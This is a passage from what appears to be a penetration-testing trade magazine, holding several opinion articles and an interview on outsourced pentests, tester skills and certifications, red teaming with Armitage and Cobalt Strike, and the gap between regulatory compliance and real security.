Regulatory requirements are also evolving and generally this tends towards stricter security controls which can result in additional complexity. Introducing a requirement to perform authenticated testing, for example in PCI v3, creates a need to perform Penetration Testing in a very different way on some systems. For applications that require authentication, it can be very difficult to obtain credentials for the SI Penetration Testers, or there may be other complexities due to conflicting regulatory requirements around who can get access or how the access must be provided. If this is a new requirement for which the organization has never previously had to deal with, especially outside of its pre-production testing networks, sometimes a new end-to-end facility to permit authenticated testing must be created. All of this will take time. The contract between the organization and the SI may simply not accommodate this at all, but the time to find this out is not a few weeks before the regulatory audit is due! When outsourcing such things as Penetration Testing to an SI, there is often an implicit level of trust and the service is not generally questioned. Service reporting is often all ‘green’ indicating all deliverables are on track; afterall, that’s what you pay an SI for – to deliver the contracted service on time. You don’t generally get an independent attestation as to quality, or careful validation that it is meeting the real security requirements of the organization. Few SIs pro-actively deliver this kind of service and it is incredibly important for the organization to either employ people with the necessary skills to validate the quality and scope of penetration testing, or to regularly dip-test by using an independent Penetration Testing organization who can provide a baseline to identify service gaps. If you are to avoid the pitfalls caused by implicit trust in the services delivered by an SI, and to maximize the actual deliverables, then the governance over the scope and quality of testing should never
be outsourced directly to the SI. That and the growing pressures of regulatory compliance, especially PCI, may mean it’s time to renegotiate the contract with the SI and to seek a regular independent view
to ensure they stay on track. About the author: JIM HART
A seasoned Security Professional who has developed and honed his skills over the past 15 years in security. A consummate specialist who has successfully transformed from a highly skilled technical engineer, to Manager of a team of security analysts (UK and matrix-managed those in India), through consulting and then transitioning into a business development role delivering thought-leadership for major clients’ information security requirements within an Enterprise sales team of a Fortune500 security software and service provider.
26
Pentesting a true art form by Martin Brough
Pentesting is truly an art form that I have studied for most of my life, however, pentesting is a dying art form that needs to be resuscitated! I don’t mean that people are no longer using them; in fact, it’s just the opposite. I have noticed that over the past five years, annual pentesting is working its way from being thought
of as something you just do to meet (enter acronym here) compliance to standard IT security practice. Within the past two years, I have noticed a significant increase in companies adding annual pentests into their contracts with companies that handle their data. Companies that offer services such as SaaS, cloud data storage, outsourced web development and media management are now all being required by contract to participate in both annual audits of their systems and penetration tests to ensure their data is secure. So what do I mean by “Pentesting is a dying art form?” I meant that pentesting is
a highly skilled practice and should be conducted by professionals who have been trained and know what they are looking for and how to test your company's systems. It seems that every script-kiddie with a Kali box these days will tell you they are a pentester!
A true pentest cannot be done from a box of automated tools It involves a ton of research, analytics, scanning, probing, watching, social engineering, oh and yeah… exploitation! When I was growing up, if you wanted to learn to be a pentester or how to find vulnerabilities in software or hardware, you needed to be a member of small groups that did that as a hobby. Penetration testing used to be viewed as hacking and hackers have always been close-knit groups that don’t share a lot unless you are vetted. Online video resources, like YouTube, I feel have changed that a lot. If you want to know what command to run in Nikto or Nmap,then just Google it and find a tutorial that some other teenager posted after watching another teenager do it. I am excited to see the direction that pentesing is taking as far as being accepted on a corporate level because it says to me, that people are starting to care about their data and what it’s doing.
27
I think it’s really important to convey a few key points about penetration tests; 1. A Pentest does not make your company un-hackable. The main objective of a well-done pentest is to reduce your attack surface. Your goal as a company should be to allow the specialized team conducting the pentest, to treat your network as though they were a real attacker trying to get in. You want to find as many holes in your network as you can and close them. 2.Put as few restrictions on the pentesters as possible. A recent trend I have noticed in the past year has been companies that are contractually obligated to have these tests done but see them as a burden and dramatically limit the network exposure that the teams are allowed to have. This makes the results of your pentest borderline useless. One example I have seen of this is when told I can give them a report of my web application scans but under no circumstances am I to exploit any vulnerability found. Exploitation not only helps to find the directions of traversal after gaining access but also tests any scanners, firewalls and loggers that are in place to see if they are configured to pick up on these kinds of events, so it is very important to allow the pentesters to run a full pentest against your defenses. And finally number 3. After all is said and done, your pentest is complete and your attack surface reduced and you have your certificate in hand, spend the next 364 days maintaining the hard work you just put in. Patch your systems, check your logs, and always verify your code.
A pentest does not make your company un-hackable. So what does all this mean for the future of pentesting? I believe that we will continue to see a massive increase in the requirement to have not only annual but semiannual pentests conducted for high profile companies especially. I strongly feel that C-Level personnel in these enterprises are starting to see not just the compliance value but also the security value to having proper pentests conducted. Executives are able to see firsthand more and more in the news just how important it is to maintain a secure environment for your company’s data. Of course, with the increase in demand for pentesting, there
in turn is an increase in those offering pentest services. Make sure you do your homework on who you sign to conduct your pentest. That person, whom you give access to your network, can do a lot
of damage if they are guessing their way through! If you see your pentester sitting in your office watching a YouTube video on how to use msfconsole, you need to dismiss them as soon as you can. There are plenty of reputable companies out there, you just need to find one that meets your company's needs as well as fits your company’s financial situation. About the author: MARTIN BROUGH
Solutions-oriented IT Specialist with notable success directing a broad range of corporate IT initiatives while participating in planning and implementation of information-systems solutions in direct support of business objectives.
28
Think of security as a wheel and a never ending circle interview with Martin Voelk CEO of Cyber 51
MARTIN VOELK
Martin is an IT Security veteran with 18 years of experience
in the IT industry. Prior to setting up CYBER 51 in 2009, Martin was already regularly teaching Penetration Testing Training Courses, Cisco authorized Security Courses and was regularly engaged by governments and other businesses to establish Security policies, perform Ethical Hacking and Penetration Tests in order to secure network infrastructures and to remediate the threats encountered.
[PenTest Magazine]: Can you tell us something about yourself? [Martin Voelk]: My name is Martin Voelk, I am 41 years old and have been in the IT Industry since 1997.
I started out as a systems admin, and moved into networking where I achieved numerous certifications up to Cisco CCIE. As of 2005, I gained more interest in IT Security and started with penetration testing services as a contractor. Despite being more on the commercial side of things now, I hold a lot of current pentesting certifications such as the CEH, OSWP and OSCP as I am fascinated by auditing networks and infrastructures. [PM]: What convinced you to establish your own company? [MV]: Numerous factors played a role. I am an entrepreneur by heart and wanted to create my own company being able to focus on penetration testing. Financial reward was also one of the drivers and so was independency. [PM]: Your firm provides services for companies from different sectors like card industry, healthcare, manufacturing or educational. Do you find more sectors become aware of cyber attacks? [MV]: Security awareness has certainly reached board level. Many clients we have still don’t believe they could be targeted, but use our services regardless because they are bound to government and industry regulations such as PCI, HIPAA, ISO 27001 etc.
29
[PM]: What is the major difficulty in working with such different companies and sectors? [MV]: One big challenge is to find the right way of addressing uncovered vulnerabilities with customer.
In some occasions, especially in larger companies, internal engineers become very defensive when being confronted with results. However, it’s not our aim to finger point. We merely uncover holes and help customers becoming more secure. On other occasions, the more we find, the more it is appreciated. Another big challenge is governmental work as it often requires very specific skills and certifications but the consultant holds a wrong passport. This can be very frustrating at times as, for example, only a UK citizen is allowed to perform the work for a UK government client. [PM]: From your own experience, do you prefer to work with smaller or bigger companies? [MV]: We prefer mid size to large size. [PM]: I can see your company provides great initiative: free educational sessions for children. Can you tell us more about this idea? [MV]: Those are little awareness workshops for children at schools. We started that program in Mexico where one of our offices is. We teach children how to stay safe when using laptops, smartphones, pads, social media, chat rooms, etc., and we also show parents how to employ filters for content not suitable for kids. [PM]: What are your general thoughts about development of cyber security market? [MV]: The big areas we see (and where loads of attacks are directed to) are: Human user (Social Engineering), Web Applications, Mobile Apps and Wireless. [PM]: As a person who knows penetration testing tools a lot, do you think there are going to be any breakthrough changes in technology? [MV]: Cloud Services will change the tool landscape even more than it already has. Web Applications will become more sophisticated and need more testing and the mobile market brings its own new challenges in Wireless and Apps. [PM]: Can you tell us what is changing in terms of recruiting pentesters or cyber security specialists? Do you find it's going to be harder to find a job in this area? [MV]: Our main markets are the US and strong emerging markets in Latin America (mainly Brazil, Chile, Colombia and Panama). We also engage in the UK market but very little in other countries. For us the biggest challenge is actually finding the right skill set for new hires. Unlike in Europe, companies and employers in the US actually often struggle to find the right skills available. The top 3 criteria :
30
- OSPC certified or better (OSCE etc.) The Offensive Security Certifications are the best ones in the market and we hire OSCP’s over CEH, because the OSCP is a hands on and very challenging exam. Someone who passed that exam is a real pentester who also can do reporting - - Good English skills to communicate with the customer and write reports. Sounds basic, but a lot of the guys outside the US don’t come with great English language skills. - Integrity, working to timelines and reliability. [PM]: Everyday we can hear about new attacks. How do you see cyber threats evolving in the near future? [MV]: It will remain a never ending cat and mouse game. The trends are shifting more to organized crime and away from individual guys. Some of the attacks we have seen at customers require teams of highly skilled experts and tools and a lot of the underworld has created and is creating task forces for certain jobs. A lot more challenging to tackle than the lone hacker or script kiddie. [PM]: Have you got any final thoughts about trends in penetration testing and vulnerability analysis in 2016? [MV]: We see a lot of the regulations which are standard in the Western world being adopted by Latin American countries now as well. PCI 3.0 introduced a lot of changes which focus more on pentesting. Also a lot of companies start realizing that technical defense isn’t everything and that social engineering makes up a lot of the breaches. User education and enforcement of policies will become a much bigger part. [PM]: Do you have any thoughts or experiences you would like to share with our audience? Any good advice? [MV]: Think of security as a wheel and a never ending circle. A traditional pentest (Network and Web App) is not good enough anymore these days. Pentesting should include mobile App, Wireless, Bluetooth and Social Engineering. For aspiring pentesters and existing pentesters, do the Offensive Security Certified Professional (OSCP) certification. It’s very well recognized in the industry and weeds out the theory from the hands on folks.
31
The sword and the shield by Tom Updegrove
I started to write this article about one of my favorite security tools “Cobalt Strike” but as I delved into the history and thinking behind Cobalt Strike I realized that a better story lies beneath the surface. The real story is about Pentesting and Adversarial Role Playing, which is thought to be the next stage of Digital Security. There’s a whole new breed of White Hat Hackers and they belong to Threat Actors. There’s a whole new breed of White Hat Hackers and they are called Threat Actors.
THE FUTURE OF DIGITAL DEFENSE Penetration Testers tend to focus on gaining access and scream eureka when they get a shell. On the other hand Threat Actors focus on post-exploitation, lateral movement, and persistence. Most Penetration Testers that I know, say the test is over once they gain access to a system; whether that was by gaining access to a server room and dropping a zombie pineapple into the mix, or brute forcing a password and escalating privileges. On the other hand, Adversarial Role Playing involves a much longer engagement, and the behavior is more similar to a real Advanced Persistence Threat or APT. The focus is on how well the Network Defender can detect, mitigate and subdue the invader. According
to Raphael Mudge (the developer of Armitage and Cobalt Strike), this is the future direction of Digital Defense.
ARMITAGE On the Armitage home page it says: “Cyber Attack Management for Metasploit”, but Armitage is more than that. Armitage is a scriptable red team collaboration tool for Metasploit; that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework. My first introduction to Metasploit was via the CLI, which was important to understand the framework. How well one understands the Exploits, Payloads, Meterpreter, Auxiliary components and scripts determines how well and effective the attack is. Seeing the same commands and getting feedback visually is so much more helpful. More like listening to a TV show on radio then seeing it on 4K flat screen in surround sound. Well maybe not that extreme but you get the idea. 32
COBALT STRIKE Cobalt Strikeis like a grown up version of Armitage. According to its website, Cobalt Strike is for Adversary Simulation and Red Team Operations. Versions 1.0 & 2.0 utilized the Metasploit Framework and was one of the first usable GUI frontends for Metasploit. An important component of Cobalt Strike is “Beacon”. “Beacon is Cobalt Strike's payload to model advanced attackers. Use Beacon to egress
a network over HTTP, HTTPS, or DNS. You may also limit which hosts egress a network by controlling peer-to-peer Beacons over Windows named pipes” (Cobalt Strike website). Another aspect of Cobalt Strike is its social engineering features which allows the Actorto get a foothold, covert command and control with Beacon, browser pivoting, and reporting to Armitage's existing exploitation and team collaboration capabilities. Using Beacon you can tunnel Meterpreter commands and utilize all of the Metasploit exploit and post exploit capabilities. Beacon facilitates the running of Power Shell scripts over its connection; Python or Java for example. There is even an email phishing module that reports when your recipients open the Phishing email you sent them.
COBALT STRIKE 3.0 As of October 2015, Cobalt Strike 3.0 does not share code with Armitage or depend on the Metasploit Framework. It's the first version of Cobalt Strike to not depend on the Metasploit Framework. The tool is geared towards red team operations and adversary simulation services. Although it does not depend on the Metasploit Framework you can still run Metasploit elements. Through one Metasploit instance, your team will: •Use the same sessions •Share hosts, captured data, and downloaded files •Communicate through a shared event log. •Run bots to automate red team tasks. Since October 2015, Cobalt Strike 3.0 has been available via the website. You can download a trial version at https://www.cobaltstrike.com/trial . You can also download its sibling (Armitage) free
of charge athttp://www.fastandeasyhacking.com/download
RED TEAMS According to Wikipedia “A red team is an independent group that challenges an organization
to improve its effectiveness. The United States intelligence community (military and civilian) has red teams that explore alternative futures and write articles as if they were foreign world leaders.Little formal doctrine or publications about Red Teaming in the military exist.[1]” LtCol Brendan S. Mulvaney Marine Corps Gazette July 2012. "Strengthened Through the Challenge"(PDF).
33
PENETRATION TESTERS AND RED TEAMS Penetration testers assess organization security, often unbeknownst to the clients staff (only management would be aware of the assessment). This type of Red Team provides a more realistic picture of the security readiness than exercises, role playing, or announced assessments. The Red Team may trigger active controls and countermeasures within a given operational environment. Red Team Operations
- Full Scope Penetration Tests
-Long-term Operations
-War
G a m e s
-Threat Scenarios / Cyber Security Exercises / Attack Simulations
Once a threat actor gains access to the network, they maintain the communication with the compromised computer system. THREAT ACTORS Threat actors gain more privileges by getting login credentials from the network that has access to valuable information. They also gather information (e.g. documents found in desktops, network access for shared drives etc.) via regular user accounts. Once identified, the data is made ready for exfiltration.
GAINING PERSISTENCE ACROSS THE NETWORK Lateral movement usually involves activities related to reconnaissance, credentials stealing, and infiltrating other computers. When communication with the compromised systems and C&C (command and control) servers has been established, threat actors sustain persistent access across the network. They move laterally within the network and gain higher privileges through the use of different tools. This in turn enables threat actors to have access to servers, which contain valuable information—the company “crown jewels.” Apart from servers, threat actors are also interested in endpoint systems. For instance, confidential documents such as Microsoft Word, Microsoft Excel and Microsoft PowerPoint files are stored
on personal computers.
34
As threat actors move deeper into the network, their movements and methods become difficult
to detect, especially when they utilize Windows features and tools typically used by IT administrators. Gaining administrative privileges also makes threat actors’ activities undetected or even untraceable.
REMEDIATION In the past few years, there have been a number of great industry reports written and statistics shared on data breaches and investigations. Many of them focus on investigative findings and detection trends. There has been less focus, however, on what is arguably the most transformative component
of an adversarial engagement – the successful remediation and the maturation of an organization’s ability to detect and respond to attacks moving forward. How do attackers respond to remediation actions, and what distinguishes successful organizations from those that were less successful? A few points to consider; -The average time for attackers to conduct reinfection attempts after an organization completes initial remediation -The percentage of organizations impacted by more than one attack group at a time -The percentage of organizations who are detecting attacks internally versus those that are being notified by third parties -The factors that influence effective and efficient investigation and remediation -Why some organizations remediate successfully and efficiently, and why others struggle
THE TOOLS The tool needs for Adversary Simulations are far different. A unique covert channel matters far more than an unpatched exploit. A common element of Adversary Simulations is a white box assumed breach model. Just as often as not, an Adversary Simulation starts with an assumed full domain compromise. The goal of the operator is to use this access to achieve effects and steal data in ways that help exercise and prepare the security operations staff for what they’re really up against. Remember too, that the threat actor in a production environment may also be an employee of the company, acting inside the corporate network.
ADVERSARY SIMULATION TRAINING The tools for Adversary Simulation are coming. The tools alone are not the full package however. Adversary Simulations require more than good tools, they require good technicians.
TRADECRAFT Raphael Mudge uses the term “Tradecraft” to describe the mindset for Adversary Simulations. He says that they “require an appreciation for the efficacy that simply isn’t there in the penetration testing community yet”. Tradecraft are the best practices of a modern Adversary. What is the adversary’s 35
playbook? What checklists do they follow? Why do they do the things they do?-these are questions that need to be asked by a corporates security defenders.
THE BEST DEFENSE IS A GOOD OFFENCE Both Armitage and Cobalt strike pack enough offensive capability to both abruptly take down
a network instantly as well as the ability to act as a long term data exfiltrator. Penetration Testers will get the most benefit from the current version of Armitage due to its use of the Metasploit Framework and ready-made exploits. Threat Actors will get the most benefit from Cobalt Strike 3.0 due to its “Beacons” and “Social Engineering” tool set. Whichever tool you use wield it like a sword so the network defenders can develop their defensive skills. About the author: TOM UPDEGROVE
ITC expert in the Philadelphia/DC Metro area. He is CEO of Philadelphia based “Internetwork Service & Security” where he manages a number
of business networks and provides advice for network design, work flow, performance optimization and security. He is also an EC Council certified trainer and conducts classes in Ethical Hacking in the Washington DC area. Tom has recently been featured in a video series along with partner Larry Greenblatt in the program they created “Cyber Kung Fu”. This has been released on Secure Ninja TV and it shows all of the concepts and tools that the Pro’s use for Pen Testing. https://www.youtube.com/watch? v=8R3QjNXDaVA. He has also presented security lectures at Hacker Halted and Sharkfest in 2014.
36
Impact of compliance on information security by Ayo Tayo Balogun
"Target was certified as meeting the standard for the payment card industry in September 2013. Nonetheless, we suffered a data breach."Target Chairman, President, and Chief Executive Officer Gregg Steinhaf In Information Security, there are a plethora of Laws and Regulations: SarbanesOxley Act (SOX); Payment Card Industry Data Security Standard (PCI DSS); GrammLeachBliley Act (GLB); Electronic Fund Transfer Act, Regulation E (EFTA); CustomsTrade Partnership Against Terrorism (CTPAT); Free and Secure Trade Program (FAST); Children's Online Privacy Protection Act (COPPA); Fair and Accurate Credit Transaction Act (FACTA), including Red Flags Rule; Federal Rules of Civil Procedure (FRCP). Some of the industryspecific Guidelines and Requirements include: Federal Information Security Management Act (FISMA); North American Electric Reliability Corp. (NERC) standards; Title 21 of the Code of Federal Regulations (21 CFR Part 11) Electronic Records; Health Insurance Portability and Accountability Act (HIPAA); The Health Information Technology for Economic and Clinical Health Act (HITECH); Patient Safety and Quality Improvement Act (PSQIA, Patient Safety Rule); H.R. 2868: The Chemical Facility AntiTerrorism Standards Regulation. How many of these Regulations, Laws, Guidelines a business needs to adhere to would depend on what part of the world the business operates from (or is domiciled). Laws, Regulations, Standards and Guidelines are very familiar words when it comes to Information Security. One other word that ties all the previous words together is Compliance. Compliance, generally speaking, is the basis for audits. Compliance is also the native language the Executive Management
of any enterprise understands. The great debate for us however is: does compliance really translate
to good security?
good information security covers people, process and technology. What is Good Information Security? According to Malcolm Carrie, head of global strategy and architecture at BAE Systems, good information security covers people, process and technology.
37
It creates the understanding, at all levels in the organization, that finding the appropriate balance
of availability, integrity and confidentiality requires a full appreciation of the risks. The rush for Compliance has more or less taken center stage in recent times, and a lot of businesses (and the people driving those businesses) forget or are unaware of the fact that Information Security needs should primarily be the driving force for Compliance criteria/metrics; people would not just erect the compliance barrier for its own sake. In order to achieve good security, appropriate processes, practices and technologies need to be implemented. In 2014, the FBI sent a warning to the healthcare industry that its data was not secure. The biggest vulnerability was the perception of IT healthcare professionals’ beliefs that their current perimeter defenses and compliance strategies were working when clearly the data states otherwise. Lots of organizations focus on compliance and have several reams of paper to show for it — policies, procedures, and training records. Several of these organizations purchase compliance-in-a-box kits, and because the focus is on compliance and not really security, much of the content of the compliancein-a-box kit still has the original blank spots where the name of the organization in question should have been inserted. A lot of the organizations that eventually complete their documentation might never incorporate the documentation into the corresponding process. Additionally, because assessment for compliance might be primarily based on responding to hundreds of questions in compliance assessment tools, or discussing with consultants, many businesses will maintain that the security described in their policies and procedures is really in place. They might even believe it themselves!
The fact that a company has been certified compliant does not guarantee that it is secure The importance of compliance cannot be overemphasized but true Information Security goes way beyond ticking boxes and answering a few generic questions that the consultant may have prepared. The goal of compliance programs is to satisfy externally imposed requirements, and the requirements
in point may or may not support an effective security program. The fact that a company has been certified compliant does not guarantee that it is secure, and some obligations that it fulfills may not contribute anything to security. For every business that can afford it, building an in house IT security team might be the best way to go, and for businesses that are unable to afford it, having
a knowledgeable consultant(s) review their business process and advise, as well as help implement appropriate security solutions, would be the way to go. Irrespective of the sector a business operates in, the management needs to know that hackers will always look for loopholes, and unless a business implements a comprehensive security program, and remains eternally vigilant, hackers will always find the loopholes they want, either by exploiting the OS, the infrastructure, the firmware, the process or the people. Risk analysis is also a very critical success factor in information security. Businesses should determine how much risk they are exposed to and plan accordingly after appropriately classifying the risk. Risk analysis should be done as regularly
as practicable to ensure that no part of the business process is being excluded. 38
Ensuring that the IT security team is knowledgeable and dedicated is also a major requirement that needs to be addressed. One can never know how truly secure a system is until it has been tested. The IT security team (complementary to the testing by external consultants) needs to routinely conduct penetration testing exercises to evaluate every facet of the business process, not with the intention
of achieving regulatory compliance but with the objective of determining the security posture of the business in order to apply any needed corrective measures before vulnerabilities are exploited by hackers. About the author: AYO TAYO BALOGUN
Information Security Analyst with Technology Support and Management experience. He’s a serial contributor and beta tester for online IT Security publications. Ayo currently works as Head of Enterprise Security
at SystemSpecs Nigeria.
39
